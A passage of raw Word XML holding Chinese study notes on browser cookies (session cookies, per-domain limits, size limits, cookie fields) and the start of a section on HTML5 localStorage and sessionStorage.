          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，会话cookie是指在不设定它的生命周期expires时的状态，前面说了，浏览器的开启到关闭就是一次会话，当关闭浏览器时，会话cookie就会跟随浏览器而销毁。当关闭一个页面时，不影响会话cookie的销毁。会话cookie就像我们没有办理积分卡时，单一的买卖过程，离开之后，信息则销毁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="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pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cookie的限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cookie的性质上是绑定到当前域名下的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>当设定了当前Cookie后，再给创建它的域名发送请求时都会包含这个cookie。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>每个域的Cookie是有数量限制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，不同的浏览器之间各不相同：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IE6及之前的版本限制每个域最多20个cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IE7及之后的版本限制50个cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Firefox限制每个域最多50个cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Opera限制每个域最多30个cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Safari和Chrome对cookie的数量没有限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>浏览器对域的大小也有限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，大多数浏览器都有大约</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4kb的长度限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cookie的构成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ookie由浏览器保存由以下信息组成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：cookie的名称，具有唯一性，不区分大小写，cookie名称必须经过URL编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：存储在cookie中的字符串值，必须经过URL编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：cookie只对指定域有效。所有向该域发送的请求都会包含该cookie信息。这个值可以包含子域(如：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.baidu.com" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>www.baidu.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)，也可以不包含子域(如:baidu.com，这样就对baidu.com所有子域都有效，这是实现单点登陆的关键)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：对于指定域中的那个路径，应该向服务器发送cookie。例如：你可以指定向</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.baidu.com/pay" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>www.baidu.com/pay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发送cookie，而</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.baidu.com不会发送cookie" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>www.baidu.com不会发送cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>失效时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：表示cookie何时应该被删除的时间戳，这个值是GMT 格式的日期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>安全标志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：指定后，cookie只有在使用SSL连接时才会发送到服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">参考资料：  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/u014753892/article/details/52821268" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/u014753892/article/details/52821268</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LocalStorage和SessionStorage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t>HTML5 提供了两种在客户端存储数据的新方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:before="45"/>
        <w:ind w:left="526"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t>- 没有时间限制的数据存储</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="45"/>
        <w:ind w:left="526"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t xml:space="preserve">sessionStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
